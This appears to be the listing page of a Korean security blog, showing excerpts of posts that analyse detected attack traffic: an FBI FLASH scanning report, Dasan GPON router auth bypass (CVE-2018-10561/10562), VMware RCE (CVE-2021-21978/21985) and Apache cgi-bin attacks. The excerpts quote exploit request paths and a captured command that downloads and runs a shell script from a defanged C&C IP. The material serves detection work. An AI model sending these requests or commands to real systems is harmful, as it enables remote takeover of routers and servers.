반응형 IT 보안53 FBI FLASH CP-000169-TT CP-000165-TT FBI FLASH CP-000169-TT CP-000165-TT 는 무엇인가IDS / IPS 등 네트워크 보안 시스템에서 'CP-000169-TT'라는 시그니쳐가 탐지된다.'CP-000169-TT'를 알아보기 위해 구글링을 해도 자세한 정보를 찾기 어렵다.정보를 찾던 중 'FBI FLASH CP-000165-TT' 보고서를 보게 되었는데,탐지 시그니쳐 IP들이 해당 보고서에 비정상적인 스캐닝 활동의 IP 리스트에서 찾아 볼 수 있었다.보고서의 넘버링을 보았을 대 CP-000165와 CP-000169가 비슷한 Cyber Attack 보고서라 추측된다.(CP-000169 보고서는 작성이 안 된 건지 비공개 보고서인지는 모르겠다.)CP-000165-TTFBI FLASH CP-000165-TT 보고서에 의하.. 2024. 9. 23. Dasan GPON Home Routers Authentication Bypass (CVE-2018-10561, CVE-2018-10562) 분석 자료 Dasan GPON Home Routers Authentication Bypass (CVE-2018-10561, CVE-2018-10562) 분석 자료Dasan Zhone Solutions 홈 라우터(공유기)에서 발견된 인증을 우회하여 원격 코드 실행이 가능한 취약점 공격2018년에 발견된 취약점이지만 최근(2022년)까지 공격 트래픽이 탐지되고 있음관련 취약점CVE-2018-10561: Request URL에 ?images/ 문자열을 추가하여 인증 우회가 가능함CVE-2018-10562: 인증 우회 후 원격 코드를 실행할 수 있음 취약점 트래픽 예인증 우회/GponForm/diag_Form?images//menu.html?images/인증 우회 & 명령 실행XWebPageName=diag&diag.. 2024. 9. 23. VMware RCE 취약점(CVE-2021-21978, CVE-2021-21985) 분석 자료 VMware RCE 탐지 취약점CVE-2021-21978 (VMware View Planner)CVE-2021-21985 (vCenter Virtual SAN(vSAN)) CVE-2021-21978 (VMware View Planner)VMware View Planner 4.x 버전에서 원격코드 실행 취약점logupload 웹 애플리케이션을 통해 임의로 파일 업로드가 가능하고,악성 파일을 업로드하여 logupload 컨테이너에서 원격코드 실행되는 취약점영향 받는 버전View_Planner : 4.6 이전 버전취약점 트래픽 [Target IP]/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttp.. 2024. 9. 23. 아파치 웹 서비스 공격 탐지 분석 자료 아파치 웹 서비스 공격 탐지 분석 자료웹 서비스 관련 악성 트래픽IP/Port 스캐닝 행위 및 C&C 서버를 통한 추가 악성 행위 가능탐지 트래픽[Target IP]:80/cgi-bin/;cd+%2Ftmp%3Bwget+http%3A%2F%2F 45[.]95[.]55[.]214%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+Netgear%3Brm+-rf+wget.sh- Apache/cgi-bin 디렉토리에 보관된 스크립트 활용- cd, wget [C&C IP], chmod 등 command를 통한 악성파일 다운로드&실행- 45[.]95[.]55[.]214 IP는 Malware와 관련된 IP로 알려져 있음악성 IP195.178.120[.]33195.178.120[.]41.. 2024. 9. 23. 이전 1 2 3 4 5 ··· 14 다음 반응형